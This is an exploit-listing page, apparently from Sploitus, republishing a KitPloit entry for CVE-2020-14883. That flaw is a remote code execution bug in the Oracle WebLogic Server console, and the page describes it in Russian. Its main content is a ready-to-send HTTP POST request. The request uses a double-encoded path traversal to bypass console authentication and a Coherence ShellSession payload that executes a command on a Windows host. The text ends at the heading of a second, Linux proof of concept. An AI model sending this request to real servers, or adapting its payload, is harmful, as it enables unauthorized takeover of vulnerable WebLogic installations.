Sploitus

Exploit for CVE-2020-14883

kitploit Β· 2026-08-27

Exploit Code

MARKDOWN27 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MURATAYDEMIR-CVE-2020-14883
[CVE-2020-14883] Oracle WebLogic Server АутСнтифицированноС ΡƒΠ΄Π°Π»Ρ‘Π½Π½ΠΎΠ΅ Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ ΠΊΠΎΠ΄Π° (RCE)

* * *

Π£ΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π² ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚Π΅ Oracle WebLogic Server ΠΈΠ· состава Oracle Fusion Middleware (ΠΊΠΎΠΌΠΏΠΎΠ½Π΅Π½Ρ‚: Console). ΠŸΠΎΠ΄Π΄Π΅Ρ€ΠΆΠΈΠ²Π°Π΅ΠΌΡ‹Π΅ вСрсии, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΏΠΎΠ΄Π²Π΅Ρ€ΠΆΠ΅Π½Ρ‹ уязвимости: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 ΠΈ 14.1.1.0.0. Π›Π΅Π³ΠΊΠΎ эксплуатируСмая ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ позволяСт Π½Π΅Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΡ†ΠΈΡ€ΠΎΠ²Π°Π½Π½ΠΎΠΌΡƒ Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΡƒ с сСтСвым доступом Ρ‡Π΅Ρ€Π΅Π· HTTP ΡΠΊΠΎΠΌΠΏΡ€ΠΎΠΌΠ΅Ρ‚ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ Oracle WebLogic Server. Π£ΡΠΏΠ΅ΡˆΠ½Ρ‹Π΅ Π°Ρ‚Π°ΠΊΠΈ Π½Π° эту ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ ΠΌΠΎΠ³ΡƒΡ‚ привСсти ΠΊ Π·Π°Ρ…Π²Π°Ρ‚Ρƒ Oracle WebLogic Server.

**ΠŸΠΎΠ΄Ρ‚Π²Π΅Ρ€ΠΆΠ΄Π΅Π½ΠΈΠ΅ ΠΊΠΎΠ½Ρ†Π΅ΠΏΡ†ΠΈΠΈ (PoC) 1:** ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡ `tangosol.coherence.mvel2.sh.ShellSession()` для систСм Π½Π° Π±Π°Π·Π΅ Windows

root@kitploit:~
    
    
    POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
    Host: vulnerablehost:7001
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 117
    
    _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('calc.exe');");
    

**ΠŸΠΎΠ΄Ρ‚Π²Π΅Ρ€ΠΆΠ΄Π΅Π½ΠΈΠ΅ ΠΊΠΎΠ½Ρ†Π΅ΠΏΡ†ΠΈΠΈ (PoC) 2:** ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡ `tangosol.coherence.mvel2.sh.ShellSession()` для систСм Π½Π° Π±Π°Π·Π΅ Linux